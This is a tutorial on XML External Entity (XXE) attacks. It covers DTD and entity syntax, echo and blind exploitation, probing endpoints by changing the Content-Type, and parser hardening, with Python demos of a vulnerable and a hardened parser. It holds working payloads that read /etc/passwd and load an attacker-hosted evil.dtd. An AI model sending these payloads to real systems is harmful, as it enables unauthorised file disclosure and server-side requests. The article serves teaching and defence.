XML External Entity (XXE) Attacks: A Comprehensive Guide

Introduction

XXE entered the OWASP Top 10 in its 2017 edition (A4:2017, XML External Entities), which has drawn strong interest from the security community. Despite that attention, XXE remains poorly understood and its impact is often underestimated. In this article we walk through the XML syntax involved, the attack variants, how to detect the vulnerability, and how to defend against it.

What is XXE?

XXE stands for XML External Entity. An XXE attack abuses the way an XML parser handles external entities declared in a document's DTD: the attacker supplies the declarations, and the parser fetches local files or remote resources on the attacker's behalf. To grasp the attack, it is essential to understand the XML syntax involved.

XML Syntax

XML (Extensible Markup Language) is a markup language designed to transmit and store data. A basic XML document consists of three parts:

  1. XML declaration: specifies the XML version and, optionally, the character encoding.
  2. DTD (Document Type Definition): declares the document's structure and any entities it uses.
  3. Document content: the elements that carry the actual data.

The basic XML format is as follows (placeholders in brackets):

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root-element [element and entity declarations]>
<root-element>document content</root-element>

DTD Syntax

A DTD (document type definition) describes the structure of an XML document: which elements and attributes may appear, and which entities are defined. A DTD can be supplied in two ways: as an internal DTD declaration or as an external DTD reference.

Internal DTD Declaration

An internal DTD declaration places the declarations inside the XML document itself, between the square brackets of the DOCTYPE. The syntax is as follows:

<!DOCTYPE root-element [element and entity declarations]>

External DTD References

An external DTD reference points to a separate DTD file, which the parser loads by its URI (a local path or a URL). The syntax is as follows:

<!DOCTYPE root-element SYSTEM "filename.dtd">

Entity Declaration

An entity declaration defines a named piece of content within the DTD; wherever the entity is referenced later (as `&name;`), the parser substitutes that content. There are two kinds of entity declaration: internal and external.

Internal Entity Declaration

An internal entity declaration gives the entity's value inline, as a literal string in the DTD. The syntax is as follows:

<!ENTITY entity-name "entity-value">

External Entity Declarations

An external entity declaration does not contain the value itself; it names a URI (a `file://` path, an `http://` URL, or another scheme the parser supports), and the parser fetches the content from there when the entity is referenced. This fetch is what XXE exploits. The syntax is as follows:

<!ENTITY entity-name SYSTEM "URI">

A related form is the parameter entity, declared with a `%` (`<!ENTITY % name SYSTEM "URI">`) and referenced as `%name;`. Parameter entities can only be used inside the DTD itself, which is why the payloads below use them to pull in an attacker-supplied DTD.

XXE Attacks

In an XXE attack the attacker controls the XML that the application parses and injects entity declarations into its DTD, so that the parser reads local files or contacts other hosts on the attacker's behalf. XXE exploitation is generally divided into two scenarios: echo, where the result is reflected in the response, and no echo, where it is not.

Echo Scenario

In the echo scenario the application reflects the parsed content back in the response, so the result of the payload (for example the contents of a file) can be read directly from the page. There are two ways to inject XXE in the echo scenario:

  1. Direct external entity reference: declare an external entity whose URI points at a sensitive local file, then reference it in the document body. The parser substitutes the file's contents, and an application that echoes the parsed value returns them to the attacker.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
```

  2. External entity reference with an attacker-hosted DTD: point a parameter entity at a DTD file on a server the attacker controls and reference it inside the DOCTYPE. The hosted DTD then declares the entity that reads the local file, so the file-reading declaration never appears in the request body.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY % xxe SYSTEM "http://xxx.xxx.xxx/evil.dtd">
  %xxe;
]>
<foo>&evil;</foo>
```

The hosted `evil.dtd` contains:

```xml
<!ENTITY evil SYSTEM "file:///etc/passwd">
```

**No Echo Scenario**

In the no echo (blind) scenario the response does not reflect the result of the payload, so the attacker cannot read the file from the page. Instead the data is extracted over an out-of-band channel: the injected DTD makes the parser issue a request to an attacker-controlled server, typically with the stolen content embedded in the requested URL, and the attacker reads the data from that server's logs rather than from the application's response.

**XXE Vulnerability Detection**

The most direct way to detect XXE is to find the endpoints that accept XML as input and test them. Often these endpoints are not obvious: a request that normally carries JSON or form data may still be handed to an XML parser if the body looks like XML. Use a proxy such as Burp to vary the HTTP request method and the Content-Type header (for example, resending a JSON body as `application/xml`) and watch whether the application parses what you send.
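The probing workflow described above, as an added example that is not part of the original article. The probe uses only an internal entity, so it reads no files and makes no network calls; it tells you whether the application's parser processes a DTD at all, which is the precondition for the external-entity payloads shown earlier. `mock_endpoint` is a constructed stand-in for the target application (it parses XML only for XML Content-Types); in a real engagement the same probe is sent through Burp to the real endpoint, and the marker value is arbitrary.

```python
"""Added example (not from the original article): detect entity expansion
with a harmless internal-entity probe, sent under several Content-Types.
Standard library only."""
import xml.dom.minidom

PROBE_MARKER = "xxe-probe-7c1e9"   # constructed, arbitrary token


def build_probe(root="data"):
    """XML body whose only entity is internal: it expands to PROBE_MARKER
    only if the server's parser processes the DTD. Safe to send, since it
    touches no file and no network."""
    return ('<?xml version="1.0"?>'
            '<!DOCTYPE %s [<!ENTITY probe "%s">]>'
            '<%s>&probe;</%s>' % (root, PROBE_MARKER, root, root))


def looks_like_entity_expansion(response_body):
    """True if the server reflected the expanded entity, i.e. it parsed our DTD."""
    return PROBE_MARKER in response_body


def mock_endpoint(content_type, body):
    """Constructed stand-in for the target: treats the body as XML only when
    the Content-Type says so, which is why a tester varies that header.
    minidom (Expat underneath) expands internal entities by default."""
    if content_type not in ("application/xml", "text/xml"):
        return "unsupported media type"
    doc = xml.dom.minidom.parseString(body)
    node = doc.documentElement.firstChild
    return "received: " + (node.data if node is not None else "")


def probe_endpoint(endpoint):
    """Send the probe under each Content-Type; return those where the
    response shows entity expansion."""
    hits = []
    for ctype in ("application/json", "application/x-www-form-urlencoded",
                  "application/xml", "text/xml"):
        if looks_like_entity_expansion(endpoint(ctype, build_probe())):
            hits.append(ctype)
    return hits


if __name__ == "__main__":
    print("Content-Types where the parser expanded our entity:",
          probe_endpoint(mock_endpoint))
```

A hit here only proves that a DTD is processed; follow up with the external-entity payloads from the attacks section (or a blind, out-of-band probe) to confirm that external entities are actually resolved.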

**XXE Repair and Defense**

To fix and defend against XXE, the core measure is to stop the parser from resolving external entities. libxml2 2.9.0 and later no longer load external entities by default, so upgrading removes the exposure for applications that rely on the defaults; application code can still re-enable resolution, however (for example PHP's `LIBXML_NOENT` option or `libxml_disable_entity_loader(false)`, or lxml's `resolve_entities=True`), so the version alone is not a guarantee. Whatever the platform, examine the XML parsing library the application actually uses and explicitly disable external entity resolution, external DTD loading and parameter entity processing; if the application never needs a DTD, reject documents that contain a DOCTYPE outright.
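The echo-scenario payload from the attacks section run through two parser configurations, as an added example that is not code from the original article. `parse_vulnerable` behaves like an application that lets its parser resolve external entities, and `parse_hardened` applies the defenses described above (no external entity handler, parameter entity parsing off, DOCTYPE rejected). Only the Python standard library (Expat) is used; `FAKE_FS` and its one-line `/etc/passwd` are constructed stand-ins so the demo never touches the real filesystem.

```python
"""Added example (not from the original article): an Expat-based parser that
resolves external entities the way a vulnerable endpoint does, beside a
hardened parser that refuses DTDs. Standard library only; the target file
and its contents are constructed stand-ins so the demo runs offline."""
import xml.parsers.expat as expat

# The "echo scenario" payload: one external general entity pointing at a
# local file, referenced in the document body.
XXE_PAYLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>"""

BENIGN_DOCUMENT = b'<?xml version="1.0"?><foo>hello</foo>'

# Constructed stand-in for the server's filesystem (assumption: a single
# line, so the result is deterministic and the real /etc/passwd is never read).
FAKE_FS = {"file:///etc/passwd": b"root:x:0:0:root:/root:/bin/bash"}


def parse_vulnerable(xml_bytes, fetch=FAKE_FS.get):
    """Parse the way an application does when it lets the parser resolve
    external entities. Returns the document's text content, which an
    echoing endpoint would send straight back to the attacker."""
    parser = expat.ParserCreate()
    text = []

    def external_entity_ref(context, base, system_id, public_id):
        body = fetch(system_id)
        if body is None:
            return 0            # unresolved entity: Expat aborts the parse
        # A resolving parser feeds the fetched bytes to a child parser, and
        # whatever that produces becomes ordinary document content.
        child = parser.ExternalEntityParserCreate(context)
        child.CharacterDataHandler = text.append
        child.Parse(body, True)
        return 1

    parser.CharacterDataHandler = text.append
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.Parse(xml_bytes, True)
    return "".join(text)


class DoctypeRejected(ValueError):
    """The hardened parser saw a DOCTYPE; no legitimate input here needs one."""


def parse_hardened(xml_bytes):
    """Same parse with every entity feature off: no external entity handler,
    parameter entity parsing disabled, and any DOCTYPE is fatal. Refusing the
    DTD outright also stops internal-entity tricks such as billion laughs."""
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    text = []

    def start_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeRejected("DOCTYPE %r not allowed" % name)

    parser.StartDoctypeDeclHandler = start_doctype
    parser.CharacterDataHandler = text.append
    parser.Parse(xml_bytes, True)
    return "".join(text)


def hardened_rejects(xml_bytes):
    """True if the hardened parser refuses the document."""
    try:
        parse_hardened(xml_bytes)
    except DoctypeRejected:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable parser returns:", parse_vulnerable(XXE_PAYLOAD))
    print("hardened parser on benign input:", parse_hardened(BENIGN_DOCUMENT))
    print("hardened parser rejects payload:", hardened_rejects(XXE_PAYLOAD))
```

The vulnerable variant is deliberately the smallest code that reproduces the bug: the damage is done entirely by the `ExternalEntityRefHandler`, which is exactly the hook (under whatever name a given library gives it) that the defense must leave disabled. Rejecting the DOCTYPE is the simplest hardened configuration when the application never needs a DTD; if it does, keep the DTD but still leave external entities and parameter entity parsing off.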

**Summary**

XXE has a wide range of uses and can do serious damage. Beyond reading files as shown above, it can be used for denial of service (through entity expansion), command execution where the parser exposes a suitable URI scheme, SQL and XSS injection via the content the parser substitutes, port scanning of the internal network, and pivoting to internal hosts. The original article also summarizes its verification environment, which contains several other vulnerabilities, such as Heartbleed, JBoss deserialization, and Nginx parsing bugs.

**Conclusion**

In conclusion, XXE is a powerful and underestimated threat. By understanding the XML syntax, entity declarations, and the attack variants, you can better defend your web applications. Upgrade `libxml` to version 2.9.0 or later, but do not stop there: examine the XML parsing library the application actually uses and make sure external entity resolution stays disabled in its configuration.